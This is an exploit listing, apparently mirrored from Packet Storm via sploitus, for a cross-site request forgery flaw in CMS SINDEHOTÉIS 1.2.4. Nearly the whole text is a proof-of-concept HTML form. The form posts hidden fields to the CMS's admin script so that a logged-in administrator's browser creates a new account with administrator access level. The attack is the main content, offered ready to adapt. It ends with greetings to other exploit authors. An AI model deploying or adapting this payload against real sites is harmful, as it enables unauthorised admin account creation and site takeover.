Share
## https://sploitus.com/exploit?id=PACKETSTORM:223619
==================================================================================================================================
| # Title : CMS SINDEHOTÉIS 1.2.4 CSRF |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : http://www.diip.com.br/ |
==================================================================================================================================
[+] Summary : CMS SINDEHOTÉIS 1.2.4 Suffer from Cross Site Request Forgery add new admin .
[+] POc :
<h1>Cadastro Novo Membro</h1>
<br><br>
<div style="width:400px; margin:0 auto">
<form action="https://127.0.0.1.org.br/admin/scripts/funcoes.php" method="post" enctype="multipart/form-data" name="fCadastro" id="form1">
<fieldset style="border:0">
<input type="hidden" name="funcao" value="cadastro">
<input type="hidden" name="acao" value="novo">
<label>E-mail: <br>
<input class="field" type="text" style="padding: 5px; width: 300px;" name="email" id="email" onchange="vEmail(this.value);" value="" size="23">
*</label>
<div id="vEmail"></div>
<label>Senha:
<br>
<input id="pass" type="password" style="padding: 5px; width: 300px;" name="Senha" value="" size="23">
*</label><br>
<label>Confirmar senha:<br>
<input type="password" style="padding: 5px; width: 300px;" name="confsenha" class=":same_as;pass" value="" size="23">
*</label><br><br>
<label>Nome Completo:<br>
<input type="text" style="padding: 5px; width: 300px;" name="nome" id="nome" value="" size="23">
*</label>
<br>
<br>
<label>
Nível de Acesso
<select name="tipo_usu">
<option value="6">Administrador</option>
</select>
</label>
<!-- <label>Sexo:
<label>
<input type="radio" name="fsexo" value="1" id="checkbox" />
Masculino</label>
<label>
<input type="radio" name="fsexo" value="2" id="checkbox2" />
Feminino</label>
*</label>
<label>RG:
<input class="field" type="text" style="padding: 5px; width: 300px;" name="frg" id="frg" value="" size="23" />
*</label>
<label>Data de Nasc.:
<input class="field" type="text" style="padding: 5px; width: 300px;" name="fnascimento" size="23" id="calendario">
*</label>
<label>Telefone:
<input class="field" type="text" style="padding: 5px; width: 300px;" name="ftelefone" id="ftelefone" value="" size="23" />
*</label>
<label>Endereço:
<input class="field" type="text" style="padding: 5px; width: 300px;" name="fendereco" id="fendereco" value="" size="23" />
*</label>
<label>Bairro:
<input class="field" type="text" style="padding: 5px; width: 300px;" name="fbairro" id="fbairro" value="" size="23" />
*</label>
<label>Cidade:
<input class="field" type="text" style="padding: 5px; width: 300px;" name="fcidade" id="fcidade" value="" size="23" />
*</label>
<label>Estado:
<input class="field" type="text" style="padding: 5px; width: 300px;" name="festado" id="festado" value="" size="23" />
*</label><br /><br />
--><br><br>
<table width="320" border="0" cellspacing="0" cellpadding="0">
<tbody><tr>
<td> <span style="border:0">
<input type="submit" name="submit" class="submit" value="">
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================